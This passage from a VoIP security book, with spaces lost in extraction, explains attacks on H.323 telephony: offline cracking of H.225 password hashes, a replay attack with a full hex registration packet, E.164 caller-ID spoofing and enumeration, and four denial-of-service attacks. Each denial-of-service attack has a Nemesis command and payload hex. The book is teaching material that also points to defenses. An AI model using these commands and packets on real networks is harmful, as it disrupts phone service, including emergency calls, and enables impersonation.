Figure3-5.H.225usernameincleartext
H.323PasswordRetrieval
NowthatwehaveretrievedtheusernameoftheH.323endpoint(H.323ID),let'sattempttogetthepassword.TheauthenticationprocessofH.323endpointsusesH.225,asshowninFigure3-2.ThepasswordisASN.1-encoded,alongwiththeusername(H.323ID)andtimestamp(createdfromthetimeinsecondsfromJanuary1,1970),tocreateanASN.1-encodedbuffer.TheASN.1-encodedbufferisthenusedtocreateanMD5hash(labeledascryptoEPPwdHash).Asmentionedpreviously,thismodelensuresthatthepasswordisnotsentoverthenetworkincleartext;however,themodelisnotimmunetobasicofflinebrute-forceattacks.ThefollowingequationisusedtocreatetheMD5passwordusedastheauthenticatingentitybytheendpoint:
MD5(ASN.1Encoded:H.323ID+Password+timestamp)=Hash
Thismethodisvulnerabletoanofflinedictionaryattack.Anattackersniffingthenetwork,usingaman-in-the-middleattack,cancapturetwoofthethreeitemsrequiredtobrute-forcethepasswordoffline.Furthermore,becauseH.323endpointsoftenusebasicpasswords,suchasthefour-digitextensionofthehardphoneorsoftphone,thetimerequiredtogainthepasswordisminimal.
Inordertoperformanofflinedictionaryattack,theattackerneedstosnifftheusername,timestamp,andresultingMD5hashfromthenetwork,whichallgooverthenetworkincleartext.NoteinFigure3-6thattheH.323-IDrowhastheusername(USER),thetimestamprowhasthetimestampNov7,200610:32:45.00000000,andthehashrowhastheresultingMD5hash:1C8451595D9AC7B983350D268DB7F36E.
Figure3-6.PacketcaptureofH.323authenticationpacket
Atthispoint,anattackercantakeadictionarylistofpasswordsandinserteachoneintotheequationalongwithalltheotheritemsthathavebeencaptured:
MD5(ASN.1-encoded:H.323-ID+password+timestamp)=hash
Forthebrute-forceattack,theattackertakesapasswordfromthedictionaryfile,alongwiththeusername(H.323ID),timestamp,andthenASN.1encodeseachvalueindividually.TheASN.1-encodedbufferisthenhashedusingtheMD5hashingfunction.IftheMD5hashthattheattackercreatedwiththetrialpasswordisthesameMD5hashcapturedoverthenetwork,thentheattackerknowsthatshehascorrectlyguessedthepassword.IftheMD5hashisnotcorrect,theattackerinsertsasecondpasswordintotheequation,generatesanewhash,andrepeatstheprocessuntilshecreatesahashthatmatchesthehashcapturedoverthenetwork.Wecanalsolookattheprocesswithasimpleequation,suchas5+x=8.Peoplecanbrute-forcenumbersinplaceofxuntiltheyreceivethecorrectanswer.Theattacker
canstartwith1,whichisnotcorrectbecauseitequals6;then2,whichisnotcorrectbecausetheansweris7;andthen3,whichiscorrectbecausetheansweris8.Theattackerhasdeterminedthroughbruteforcethatx=3.Unlikeanonlinebrute-forceattack,wheretheattackermayhaveonlylimitedattemptsbeforeheislockedoutornoticedonthenetwork,theattackercanperformthistestindefinitely(offlineonhisownPC)untilhehascrackedthepassword.Furthermore,becausemostH.323hardphonesandsoftphonescontaineasy-to-guesspasswords,thisexercisewillprobablynottaketoolong.Forexample,iftheattackerinsertstheknownvaluesthatweresniffedfromthenetworkinourexampleaboveintothepreviousequation,theonlyunknownisthepassword,asshowninthenewequation:
MD5(ASN.1Encoded:USER+Password+1162895565)=1C8451595D9AC7B983350D268DB7F36E
Theattackercannowattemptpasswordsuntilhereceivesthecorrecthashthatwassniffedoverthenetwork.ThefollowingdemonstrationexploresthispassivedictionaryattackonH.225authentication.Thefirstcolumnshowsthesniffedusername,thesecondcolumnisthevariablethatusesabiglistofdictionarywordsforbrute-forcing(notedinboldtext),thethirdcolumnshowsthesniffedtimestamp,andthefourthcolumnshowstheresultingMD5hashvalue.OncethenewlygeneratedMD5hashvaluematchestheonesniffedoverthenetwork(highlightedinboldinthelastrow),theattackerknowshehasguessedthecorrectpasswordusedbytheH.323endpoint.
Sniffed(Captured)Entitiesoverthenetwork:-Username:USER-Timestamp:1162895565-MD5Hash:1c8451595d9ac7b983350d268db7f36e
MD5(ASN.1Encoded:Username+Password+Timestamp)=HashUSER+test+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+Sonia+1162895565+=!1C8451595D9AC7B983350D268DB7F36E
USER+Raina+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+1108+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+1117+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+isec+1162895565+=!1C8451595D9AC7B983350D268DB7F36EUSER+PASS+1162895565+=1C8451595D9AC7B983350D268DB7F36E
H.323ReplayAttack
H.225authenticationisalsovulnerabletoareplayattack.Areplayattackoccurswhenthesamehash,apasswordequivalentvalue,canbere-sentbyadifferentsourceandauthenticatedsuccessfully.Forexample,ifanentitywasacceptingonlytheMD5hashofpasswordsforauthentication,anattackercouldsimplyreplayanyMD5hashcapturedoverthenetwork,suchasthehashof"iSEC,"andreplayit.Whiletheattackerdoesnotknowwhatthepasswordis,shehasreplayedthepasswordequivalentvalueandbeenauthenticated.Forthisreason,mostMD5hashesaresaltedusingsomerandomvalue.ForH.323,thisisthetimestamp,butusingthetimestamppresentsotherissues.
Note✎
InordertopreventsimpleMD5hashingofeverywordinthedictionary,H.323usesthetimestamp(whichisuniqueforeachauthenticationrequest),username(H.323-ID),andthepasswordtocreatetheMD5hash.Hence,ifthepasswordisiSEC,itwillbecombinedwiththeusernameandcurrenttimestamptocreateauniqueMD5valueforeveryauthenticationattempt.
IftheendpointandgatekeeperusedifferenttimestampsfromtheNTPserver,thehashcreatedbytheH.323endpointwillbeinvalid.Forexample,iftheendpointreceivesatimestampofOct2,20086:34.00andthegatekeeperreceivesatimestampofOct2,20086:34:01,theMD5hasheswillbedifferentandthegatekeeperwillrejecttheauthentication.Asonecanimagine,managingthetimestampfrommultipleNTPdeviceswithhundredsofH.323endpointsand
NTPdeviceswithhundredsofH.323endpointsandgatekeeperscanbecomecumbersomeevenifthetimestampisoffby.01seconds.Therefore,theH.323gatekeepersallowanMD5hashthatwascreatedwithanoldertimestamp(usuallywithin30to60minutes)toauthenticatesuccessfully.Whilethishelpstremendouslyforoperationalpurposes(otherwise,H.323endpointscouldnotconsistentlyauthenticate),itallowsanattackertoperformareplayattack.Eventhoughuniquetimestamps,usernames,andpasswordsareusedtocreatetheMD5hash,theMD5hashisallowedtobereused(replayed)withina30-or60-minuteinterval.It'squitesimpletoperformareplayattack.Themalicioususersimplysniffs(captures)theMD5hashfromtheendpointtothegatekeeperandreplaysthehashvaluebacktothegatekeeper,whichallowstheattacker'sH.323clienttobeauthenticated.Completethefollowingstepstoperformareplayattack:
1. EnsurethattheH.323gatekeeperhasbeenenabledonyourlabnetwork.
2. OpenyourfavoriteH.323endpoint.3. Onasecondmachine(theattacker'smachine),open
Wiresharkfornetworksniffing.4. FromtheH.323endpointonthefirstmachine,connectto
theH.323gatekeeperbyenteringthecorrectusernameandpassword.
5. OncetheH.323endpointisconnectedtoH.323gatekeeper,stopsniffingonWiresharkonthesecondmachine.
6. ScrolldownonWiresharkandselectapacketwiththeProtocollabelofH.225.0andtheInfodescriptionasRAS:RegistrationRequest.
7. Togettheusername,expandtheH.225.0RASentryintheprotocoldetailssectionofWireshark(middlesection)sothatitappearsasfollows:
RASMessage:registrationRequest
registrationRequestcryptoTokensItem0Item:cryptoEPPwdHashcryptoEPPwdHashalias:H.323-IDH323.ID:[USERNAME]
8. TogettheMD5hash,expandH.225.0RASintheprotocoldetailssectionofWireshark(middlesection)sothatitlookslikethis:
RASMessage:registrationRequestregistrationRequestcryptoTokensItem0Item:cryptoEPPwdHashtoken
AvaluelabeledhashundertokenshouldbevisiblewithanMD5valuefollowingit.ThisistheMD5hashvaluethatcanbereplayedbytheattacker.(SeetheMD5hashvalueinFigure3-7.)
Note✎
NoticethetimestampfourrowsabovethisMD5hashvalue.Thisallowstheattackertoknowhowlong(inminutes)theMD5isvalidinordertoperformthereplayattack.
9. Usingapacket-generationtool,suchasNemesisorSnifferPro,createanauthenticationpacketandsendittothegatekeeperofyourchoice.Theeasiestmethodtoperformthisactionistosendanauthenticationrequestfromyour
H.323endpointtoyourgatekeeper.Thisattemptwillberejectedbecauseyoudonothavethecorrectusername(H.323-ID)andpassword;however,itcanbeusedasthetemplateforthenewpacketyouareabouttocreate.
Figure3-7.WiresharkandMD5hashwithanH.225packet
10. OnceyouhavethetemplatefromyourH.225RegistrationRequest,simplyreplacetheincorrectusername(inhex)andtheMD5hashthatwasusedwiththevaluescapturedoverthenetwork(theusernamecapturedfromthenetworkinhexaswellastheMD5hashtobereplayed).
11. Oncetheoldusername/MD5hashisreplacedwiththenewvaluescapturedfromthenetwork,sendthatpacket.Thiswillallowtherequesttobesuccessfullyloggedintothegatekeeperusingareplayattack.
ThefollowinghexinformationisanexampleofafullH.225registrationrequestpacket.TheboldinformationonthefirstlineisthetargetedIPaddressofthegatekeeper(c0a87479is192.168.116.28inhex).Theseconditeminboldistheusernameinhexcapturedbythesniffedsession(00550053
004500520000isUSERinhex).Finally,thelastiteminboldisthecapturedMD5hashfortheH.225registrationrequestpacket.
Note✎
Itemsinitalicareuniquetomylabenvironment;theseitemswillbedifferentinyourownlabenvironment.
0e8008be060008914a0005800100c0a8-IPaddress744906b80100c0a8744906b722c08201010007000000000000000001343900000000000000000000000000000002400c0044004900470053002d0069005300450043002d007400730074050049835869c376820101000754616e64626572670134392c2b10302e010404005500530045-UserName(e.gUSER)00520000c04550d14c082a864886f70d02050080801c8451595d9ac7b983350d-MD5Hash268db7f36e01000100010001000518010000126d015020df8903596f45199f2773c0a59274af00005020df8903596f45199f2773c0a59274af00463c617373656e743e3c617373656e745f747970653e636c69656e743c2f617373656e745f747970653e3c76657273696f6e3e313c2f76657273696f6e3e3c2f617373656e743e
OncethenewH.225registrationrequestpackethasbeencreatedandsentwiththesniffedMD5hash,theattackerwillhavesuccessfullyauthenticatedusingareplayattack.
H.323EndpointSpoofing(E.164Alias)
Atahighlevel,anE.164aliasisthephonenumberplanusedforaddressesandphonenumberaliasesforH.323endpoints.ItisalsooftenusedasanidentifierforH.323endpointsonthenetwork.BecausetheE.164aliasisspoofable,anygatekeeperthatusesitasatrustedvaluecanbesubverted.Generally,anyitemthat
istrustedasanidentificationentityandisalsospoofablebecomesabigsecurityproblemfortheenterprise.E.164aliasspoofingissimilartootherattacksontrustedentities,likeMACaddressesonEthernetcards,InitiatorNodeNamesoniSCSIendpoints,andWWNsonFibreChannelHBAs.IfMACaddressfilteringisbeingusedonawirelessaccesspoint,anyattackercanchangeherMACaddressusingetherchangefromhttp://www.ntsecurity.nu/andbypasstheaccesscontrols.ThesameideaholdstrueforanE.164alias.AmaliciousendpointcanchangeitsE.164aliasandregistertothegatekeeperwithaspoofedidentity.Dependingonthegatekeeper'spolicy,theattackermayormaynotneedtoperformaDoSattackagainsttheentitybeingimpersonatedbeforehand(describedlaterinthischapter)tocompletetheattack.Ifthegatekeeper'spolicyissettooverwrite,everynewendpointwithanE.164aliasalreadyinthegatekeeper'sdatabase(duplicatealias)willbeallowedtooverwritetheexistingregistration;hence,noDoSattackisneeded.Ifthepolicyissettoreject,anynewendpointwithaduplicateE.164aliaswillberejectedandthusnotallowedtojointhenetwork.Inordertojointhenetworkwiththespoofedalias,theattackerwillneedtoperformaDoSattackonthelegitimateendpointinordertoforceitintoanun-registeredstatewiththenetwork.OnceaDenialofServiceattackisperformedonthelegitimateendpointanditisforcedofftheVoIPnetwork,theattackercansliprightinwithhisspoofedalias.Furthermore,whentherealendpointattemptstore-registeronthenetwork,itwillprobablyberejectedbecausethereisalreadyanendpointwithitsE.164alias(theattacker'sendpointthatslippedin).Variouspolicieswillaffecttheoutcomeforthisattackclass.BeforetheattackerspoofsandregistersanotheridentityontheVoIPnetwork,heneedstofindtheE.164aliasasdemonstratedinthefollowingsection.Additionally,becausetheE.164aliasis
thevalueusedtocontactanotherperson,itispublicizedheavilyinVoIPenvironments(similartoaphonenumberinaphonebook).Thecompanydirectorywillhaveauser'sfullnameandhisorherE.164alias(oftenVoIPcompanydirectoriesarefullyavailablewithnoauthentication).ThisinformationcanbeusedbytheattackertospoofpracticallyanyuserontheVoIPnetwork.
Note✎
Oneexampleattackthatisfairlyseverewouldbetoappearasacompanyexecutive,liketheCEOorCFO,andreceiveormakephonecallsasthatperson.IfthereisaconferencecallwiththeSecuritiesandExchangeCommission(SEC),theattackerwillberecognizedastheCEO/CFOandcanrecordaudioclipsoftheconversation(asdescribedinChapter4).
InordertospoofyourE.164alias,completethefollowingsimplesteps.Inthisexample,wewillbeusingthePowerPlayH.323endpoint.
1. SelectStart►Programs►PowerPlay►PowerPlayControlPanel.2. SelecttheGatekeepertab.3. Notethetextboxatthebottomofthescreendisplayingthe
currentE.164alias.Changethecurrentvaluetothenewvalueyouwishtospoof,asshowninFigure3-8.(ThiscanbeanyvaluefromtheVoIPcompanydirectory,suchasthealiasoftheCEOofthecompany.)We'lluse37331.
Figure3-8.SpoofingE.164alias
4. ClickOKandyou'redone!TheE.164aliashasbeenspoofedandisnowrecognizedasanewidentityontheVoIPnetwork.Allcallsdirectedto37331willnowberedirectedtotheattacker'sendpoint.
Note✎
AnattackerwhowishestospoofanaliasthatalreadybelongstoanotherendpointwillhavetoperformaDenialofServiceattackbeforestep3ontherealH.323endpointbeforechangingherE.164alias.
E.164AliasEnumeration
ThereareafewwaystoenumerateanE.164alias,whichisneededtospoofanH.323endpoint(asshowninthepreviousexample).Theeasiestmethodissimplytosnifftheinformation
overthenetwork.Duringacall,oneendpointwillcallanotherendpointusingitsE.164alias.Thedestinationendpoint'sinformationmovesacrossthenetworkincleartext;thus,anattackercansimplysnifftheconnectionandviewthedestinationE.164alias.IfanattackerissniffingthenetworkusingWireshark,thelocationoftheE.164aliasislocatedonthedialedDigitsline.ThedialedDigitslineshowsthedestinationE.164aliasusedforthevoiceconnection.ThepathtofindthedialedDigitslineonanH.323packetusingWiresharkisshownbelow:
H.225.0RASgatekeeperRequestendpointAliasItem1Item:dialedDigitsdialedDigits
Itmaynotbepossibletosimplyperformaman-in-the-middleattacktosniffthenetwork,therebyforcingtheattackertofindabetterwaytoenumerateE.164information.Thenextmethod,whichisthebetterchoicewhensniffingisnotpossible,istobrute-forcetheinformationfromagatekeeper.WhenanendpointattemptstoregisterwithagatekeeperusinganunauthorizedE.164alias,thegatekeepersendsaSecurityDenialMessage,specifically:securityDenial(11).However,ifanendpointattemptstoregisterwithanE.164aliasthathasalreadybeenregistered,thegatekeeperwillsendaduplicateerrormessage,specifically:duplicateAlias.AduplicateerrorsignalsthattheattemptedE.164informationislegitimateandregisteredtothegatekeeperbutusedbyadifferentH.323endpoint.ThisbehaviorallowsanattackertoenumerateE.164informationfromthegatekeeper.BecauseanattackerwillbetoldwhenhehastheincorrectE.164alias(securityDenial)orcorrectbutalreadyusedE.164alias(duplicateAlias),hecan
sendseveralmillionpacketstothegatekeeperwithadifferentE.164alias(1to999999999)untilhegetsalistofduplicateAliasmessagesfromthegatekeeper.ThislistwillthengivetheattackeralistofvalidE.164numbers,allowinghimtoenumeratepossibleentitiestospoof.Toautomatethisattack,anattackercansimplywriteascripttosendmillionsofregistrationrequestpacketstothegatekeeper,eachwithauniqueE.164alias.OncetheattackerreceivesaduplicateAliaserrormessagefromthegatekeeper,hewillhaveenumeratedavalidE.164alias.Forexample,FiguresFigure3-9andFigure3-10showtheenumerationprocess.Line2(rejectReason)inFigure3-9showsanerrormessagewhenanattackerattemptstoregisterwithanE.164aliasthatisnotauthorized(securityDenial).Line2inFigure3-10showsanerrormessage(rejectReason)whenanattackerattemptstoregisterwithanauthorizedE.164aliasthathasalreadybeenregistered(duplicateAlias).ThedifferenceintheerrormessagestellstheattackerthathissecondattemptwasusingavalidE.164aliasname.
Figure3-9.SecuritydenialerrorwhentryingtoregisterwithanunauthorizedE.164alias
Figure3-10.EnumeratingE.164aliasbytheduplicateAliaserrormessage
E.164HoppingAttacks
Hoppingattacksallowunauthorizeduserstojumpacrosssecuritygroupings,allowingthemtoescapeanykindofisolationthatwasputinplace.Forexample,hoppingattacksallowunauthorizeduserstoaccessauthorizedareas.
Furthermore,theattacksallowunprivilegeduserstoaccessareaswhereonlyprivilegedusersshouldbe.PrevioushoppingattacksarebestknownfromCiscoswitches.AttackerswereabletohopacrossVLANsusingspecificVLANtagsandgainaccesstocertainnetworksthatshouldhaveotherwisebeenlimited.AnE.164hoppingattackisanextensionofthespoofingattacksdescribedpreviously.Often,gatekeeperswilluseE.164aliasesassecurityentities(allowingonlyastaticsetofE.164aliasestoregistertogatekeepersormakespecifictypesofcalls).Hence,E.164aliasesaresetupwithdifferentzonesforH.323endpoints.Forexample,onegroupofaliasesmightbeallowedtocallanywhere,includinginternationallocationsatthemostexpensivetimeofday;anothergroupmightberestrictedtocallingonlydomesticlongdistancenumbers;anothergroupmightbeallowedtocallinternalnumbersonly;andafinalgroupmightbeallowedtocallonly"900"numbers.Asofthiswriting,manycontrolsforoutbounddialingarenotused,aseverynumbercancallanywhere;however,thistrendwillprobablychange.Forexample,intoday'smobileenvironment,manycompanyconversationsthatdiscusssensitiveinformationoccurviathephone.Theassumptionisthateveryonewithaccesstothenumbershouldbeonthecall;however,conferencebridgenumbersareforwardedtothewrongplacemoreoftenthanpeoplethink.Thepre-textingandinformationleakageissuesatHewlett-Packard,motivatingthecompanytobreakthelawin2006(althoughwithvirtuallynoconsequences),ledtotheneedforstrongersecurityforsensitiveconferencecalls(http://en.wikipedia.org/wiki/2006_HP_spying_scandal/).Forexample,conferencecallsdiscussingacompany'sgoalswillneedamethodtoensurethatonlyinternalphonenumberscanjointhecall.IfthetechniqueusedtoidentifyauthorizedphonesistheE.164alias,thealiascanbespoofed.Anycontrolssetupbythegatekeeper/gatewayfordialingrestrictionscansimplybeoverriddenbyanattacker.
SpoofingtheE.l64aliasbreakstheentiremodelforidentityassuranceontheH.323VoIPnetwork.Furthermore,asanenduser,callingtheCEO,CFO,orsimplyyourco-workeronanotherfloormayresultinyourspeakingtoanattackerwhohashijackedanidentity.
DenialofServiceviaNTP
Nowthatweknowwhyauthentication(registration)andauthorizationcannotbetrustedwithH.323,let'sshiftfocustotheDenialofServiceattacksonH.323environments.
DoSwithAuthenticationEnabled
ThefirstDoSwewilldiscussoccurswhenauthenticationisenabledforH.323endpoints.Asdiscussedpreviously,H.323authenticationusesatimestampfromanNTPserver(andafewotheritems)tocreatetheMD5hash.However,anattackercanensurethatH.323endpointscannotregistertothenetworkbyupdatingH.323deviceswithincorrecttimestampinformation.ThisispossiblebecauseNTPusesUDPfortransport,whichisconnectionlessandunreliable(hence,anyattackercanforgeanNTPpacket).Forexample,anattackercouldusearogueNTPserverandsendtimestampstoH.323endpointsthatarenotthesametimestampsusedbythegatekeeper.Furthermore,theattackercouldsendtimestampstothegatekeeperthatdifferfromtheonesusedbyalltheendpoints.BecausemostH.323endpointsandgatekeepersdonotrequireauthenticationfortimestampupdates,theywillsimplyacceptthetimestampsreceivedfromtheattacker.Atbest,someendpointsandgatekeeperswillaccepttimestampinformationonlyfromcertainIPaddresses;however,attackerscansimplyspooftheirIPaddressesandthensendthemalicioustimestampinformationtotheendpoint.Hence,withincorrecttimestampinformation,theMD5hashvaluesbetweengatekeepersandH.323endpointswillnotmatch,preventing
gatekeepersandH.323endpointswillnotmatch,preventingVoIPphonefromauthenticating.
Note✎
ApowerfulattackwouldnotneedtotargeteveryH.323endpointonthenetwork,butonlythefourorfivegatekeepers.Oncethegatekeepersareupdatedwithincorrecttimestampinformation,thegatekeeperwillun-registerorrefusetoauthenticateeveryH.323endpointonthenetwork,bringingthewholeVoIPnetworktoitsknees.
UsethefollowingstepstoexecuteaDoSattackonH.323endpointswithauthenticationenabled.
1. Let'suseNemesisforpacketgeneration,whichcanbefoundathttp://www.packetfactory.net/projects/nemesis/orthebootableBackTrackLiveCD(http://www.remote-exploit.org/index.php/BackTrack/).
2. StartNemesisfromtheBackTrackLiveCD.3. DownloadiSEC.NTP.DOSfrom
http://www.isecpartners.com/tools.html/;thisistheinputfilewe'llusewithNemesisinordertoexecutetheNTPDoSattack.
4. Executethefollowingcommandinstepb.Thetestlabinformationbeingusedisshowninstepa,whichshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation
i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323gatekeeper):172.16.1.140iv. Target'sMAC(H.323gatekeeper):02:34:4F:3B:A0:D3
b. Examplesyntax:nemesisudp-x123-y123-S172.16.1.103-D172.16.1.140-H
00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.NTP.DOS
5. RepeatstepbrepeatedlyaslongasyouwanttheDoSattacktooccur(orcreateascripttorepeatitindefinitely).
6. ThefollowinghexinformationshowstheexamplepacketwithaNTPtimestampupdateofNovember7,2006.(Theactualvalueofthetimestampisunimportant;itsimplyneedstobewithinapproximately1,000secondsofthecorrecttime.)BesuretouseahexeditorifyouwishtomodifythefiletobeusedwithNemesis:
dc000afa00000000000102900000000000000000000000000000000000000000c8fb4fb9b6c2699cc8fb4fb9b6c2699c
Done!YouhavenowupdatedtheH.323gatekeeperwiththeincorrecttimestampinformation.AllH.323clientsattemptingtoauthenticatewillberejectedand,hence,preventedfrommakinganytelephonecalls.
DenialofServiceviaUDP(H.225RegistrationReject)
ThenextDenialofServiceattackinvolvesH.225RegistrationRejectpackets.Asthenamesuggests,aRegistrationRejectisusedtorejectregistrationoforun-registeranexistingH.323endpoint.ThesecurityissueisthatnoauthenticationisrequiredtoforciblyrejectH.323endpointsoffthenetwork.Hence,ifanH.323endpointislegitimatelyauthenticatedtoagatekeeper,anattackercansimplysendtheendpointoneUDPRegistrationRejectpacketandtheendpointwillimmediatelybeun-registered.Thelegitimateendpointwillthenattempttore-register,buttheattackercansimplysendanotherUDPpacketandimmediatelyun-registerit.BecausetheattackinvolvesonlyoneUDPpacket,theattackercansendregistrationrejectpacketsonceeveryfewminutesto
preventthelegitimateH.323endpointfromregisteringtothegatekeeper(preventingtheendpointfromsendingorreceivingtelephonecallsindefinitely).CompletethefollowingstepstoexecuteaDoSattackusingRegistrationRejectpackets.
1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.Registration.Reject.DOSfrom
http://www.isecpartners.com/tools.html/anduseitastheinputfilewithNemesisinordertoexecutetheRegistrationRejectDoS.
3. Oncethefilehasbeendownloaded,executethecommandinstepb.Again,thetestlabinformationbeingusedisshowninstepa;itshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation
i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3
b. Examplesyntaxnemesisudp-x1719-y1719-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.Registration.Reject.DOS
ThefollowingshowsthehexinformationfromtheprovidedRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythefiletobeusedwithNemesis.)
1400099a060008914a000583010000000000
Done!WithasingleUDPpacket,youhaveun-registeredtheH.323client.
Note✎
InordertoperformthisattackonallH.323clients,simplysendoneUDPpackettoeachIPaddressonthenetwork.ToprolongtheDoSattack,simplysendtheoneUDPpacketrepeatedly,whichwillpreventallH.323clientsfromre-registering.
DenialofServiceviaHostUnreachablePackets
ThenextDenialofServiceattackinvolvesanexistingphonecallbetweentwoH.323endpoints.WhentwoH.323endpointsestablishaphonecall,manypacketsflyacrossthenetwork.Oneofthemanypacketsisusedtoensurethatthetwoendpointsarestillthere.Forexample,whentalkingonyourcellphone,youprobablysay"Hello"whenyouencountersilenceontheotherendtomakesurethatyouhavenotbeendisconnected.Inmanysituations,thepersonmaystillbeonthelinebutsilent,whichmakesyouwonderifthecallhasbeencutoff.ThesameideaappliestoVoIP;packetsaresenttoensurethatthecallisstillconnected.InthisDoSattack,anattackercanrepeatedlyspoofanICMPHostUnreachablepacketfromoneendpointtoanother.Incertainvendorimplementations,thereceiveroftheICMPHostUnreachablepacketwillthinktheothersidehasdisconnectedandwillterminatethecall.
Note✎
AfewH.323hardphoneshavebeentestedandfoundvulnerabletothisattack.Allvendorshavebeennotified,andthisvulnerabilityhasbeenfixed.
ThefollowingstepscanbeusedtoexecuteaDoSattackusingICMPHostUnreachablepacketsduringanexistingcall.
1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.ICMP.Host.Unreachable.DOSfrom
http://www.isecpartners.com/tools.html/.We'llusethisastheinputfilewithNemesisinordertoexecutetheICMPHostUnreachableDoS.
3. Executethecommandinstepb.Thetestlabinformationbeingusedisshowninstepa;itshouldbechangedtomatchtheIPaddressesofyourlab:a. Networkinformation
i. Attacker'sIP:172.16.1.103ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3
b. Examplesyntaxnemesisicmp-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-i03-c01-PiSEC.ICMP.Host.Unreachable.DOS
4. Issuethecommandrepeatedlyorcreateascripttorepeatthecommandindefinitely.
ThefollowinghexinformationshowstheexamplepacketwithaRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythisfileforusewithNemesis.)
303035303630303132613139303035303630303165653932303830303435303030303163313233343430303066663031666666326330613837343439633061383734316630333031666366653030303030303030
Done!YouhavenowforciblyterminatedanexistingcallbetweentwoH.323clients.
DenialofServiceviaH.225
nonStandardMessage
OurfinalDenialofServiceattackoccursviatheH.225nonStandardMessagepacket.Asthenamesuggests,anonstandardH.225packetissentfromanendpointtoatargetthatcannotinterpretitcorrectly.Nonstandardmessagesareoftenusedtoperformvendor-specificactions.Incaseswherethepacketsaremisused,themisusemaycauseaVoIPdevicetocrash.Aswiththepreviousattack,anattackercanrepeatedlysendthispackettoaH.323endpointonthenetwork.Dependingonvendorimplementations,thepacketwilloverloadandcrashthesystem.Thiscrash,inturn,opensuptheendpointtomanyoftheattacksdiscussedearlierinthischapter(suchasthereplayattackorendpointspoofing)becauseittakesalegitimateendpointoffthenetworkfortwoorthreeminutes.
Note✎
AfewH.323hardphoneshavebeentestedandfoundvulnerabletothisattack.Allvendorshavebeennotifiedandthisvulnerabilityhasbeenfixed.
ThefollowingstepscanbeusedtoexecutethisDoSattack,whichcausestheremoteendpointtocrash,usingtheH.225nonStandardMessage.
1. StartNemesisfromtheBackTrackLiveCD.2. DownloadiSEC.nonStandardMessage.DOSfrom
http://www.isecpartners.com/tools.html/;thiswillbetheinputfiletobeusedwithNemesisinordertoexecutethenonStandardMessageDoSattack.
3. Oncethefilehasbeendownloaded,executethecommandinstepbwiththelabinformationinstepa:a. Networkinformation
i. Attacker'sIP:172.16.1.103
ii. Attacker'sMAC:00:05:4E:4A:E0:E1iii. Target'sIP(H.323endpoint):172.16.1.140iv. Target'sMAC(H.323endpoint):02:34:4F:3B:A0:D3
b. Examplesyntaxnemesisudp-x1719-y1719-S172.16.1.103-D172.16.1.140-H00:05:4E:4A:E0:E1-M02:34:4F:3B:A0:D3-PiSEC.nonStandardMessage.DOS
4. Issuethecommandrepeatedlyorcreateascripttorepeatitindefinitely.
ThefollowingshowsthehexinformationfromtheexamplepacketwithaRegistrationRejectpacket.(UseahexeditorifyouwishtomodifythefiletobeusedwithNemesis.)
5c0981408201010004030000040400000000
Done!YouhavenowcrashedtheH.323client.
SummaryH.323isapopularsignalingprotocolusedinVoIPinfrastructures,especiallyinenterprisenetworkswithexistingPBXsystems.H.323includesseveralsubprotocols,suchasH.235andH.225;however,thesecuritymodelofH.323anditssubprotocolsisquiteweak.AuthenticationandregistrationmethodsusedwithinH.225arevulnerabletoseveralattacks,includingpassivedictionaryattacksandreplayattacks.Aswehaveseen,theauthenticationmodelusedinH.323allowsattackerstoretrieveanendpoint'spasswordquiteeasily.Furthermore,theauthorizationmethodsusedwithH.323relyonE.164aliases,whichcanbespoofedbyanattacker.TheidentityofanyH.323endpointcannotbetrustedbecauseattackerscanperformsimpleattackstoimpersonateothers.Finally,thereliabilityoftheH.323networkleavesmuchtobedesired.ThischapterhasdiscussedonlyfourDenialofServiceattacksagainstH.323endpoints/gatekeepers;however,thereareprobablyalotmore.Voicecommunication,including911calls,requiresahighlevelofreliability/availability.Unfortunately,manyH.323entities,includinghardphonesandsoftphonesandgatekeepers/sessionbordercontrollers,arequiteeasytotakeoffline,cutoff,orsimplyensurethatnocommunicationtakesplace.WhenbuildingaVoIPnetworkusingH.323,itisimportanttoknowaboutthemajorproblemswithauthentication,authorization,andreliability/availability.ThischapterhasfocusedontheflawswithH.323inorderforuserstounderstandtherisks.Chapter9willdiscussthedefensesforVoIPcommunication,includingpossibledefensesagainstH.323attacks.
Chapter4.MEDIA:RTPSECURITYReal-timeTransportProtocol(RTP)isthemajormultimediatransportmethodforSIPandH.323.RealTimeControlProtocol(RTCP)isoftenusedwithRTPasthecomplementaryprotocolthatsendsnondatainformation,suchascontrolinformation,toendpoints.RTCPisprimarilyusedforQoS(QualityofService)information,suchaspacketssent,packetsreceived,andjitter.(JitteristhevariationinthedelayofreceivedpacketsinaVoIPpacketflow.)BothprotocolsareoftenusedtogetherforthemedialayerofVoIPnetworks(mostlyRTPwithsomesupportingRTCPpackets).WhileVoIPcallsaresetupusingH.323orSIP,thevoicecommunication(audio)betweentwoendpointswilluseRTP.Figure4-1showsanexampleofthearchitecture.
Figure4-1.RTPformediacontent
YoushouldunderstandrightawaythatRTPusescleartexttransmission,soitlacksconfidentiality,integrity,andauthentication.UserswhohaveaccesstothenetworkviaasharedmediumorevenviatheuseofanARPpoisoningattack(discussedinChapter2)cansniffRTPpackets,reassemblethem,andthenlistentothevoicecommunicationusingacommonmediaplayer,suchasWindowsMediaPlayer.WhilethesecurityissuesaroundRTPhavebeenknownforsome
